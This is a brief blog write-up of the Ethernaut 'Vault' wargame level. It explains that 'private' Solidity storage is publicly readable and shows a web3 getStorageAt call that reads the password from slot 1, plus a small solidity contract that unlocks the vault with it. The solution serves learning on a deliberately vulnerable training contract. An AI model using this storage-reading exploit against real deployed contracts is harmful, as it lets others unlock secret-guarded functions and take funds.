Ethernaut Puzzle 08 Vault

Posted on 2023-05-13 Edited on 2024-10-20 In BiWeeklyUpdate

This challenge made me realize again that all data on the blockchain is public.

The challenge provided a password for us to guess. When we correctly guess the password, the locked value will become false, and we can pass the challenge.

We can calculate the slot where a variable is stored based on the address of the smart contract. Then we can retrieve the value stored at that slot.

In this smart contract, there is a bool and a bytes32 variable. A bool variable occupies 1 byte (8 bits), and a bytes32 variable occupies 32 bytes. One slot is 32 bytes, so the bytes32 variable is stored in the first slot, not the zeroth.

1	await web3.eth.getStorageAt(contract.address, 1)

After obtaining the value of the password, we can write a smart contract to hack it.

pragma solidity ^0.7.3;

interface Vault {
     function unlock(bytes32 _password) external;
}
contract VaultSolution {
    constructor (address target, bytes32 _password) {
        Vault(target).unlock(_password);
    }
}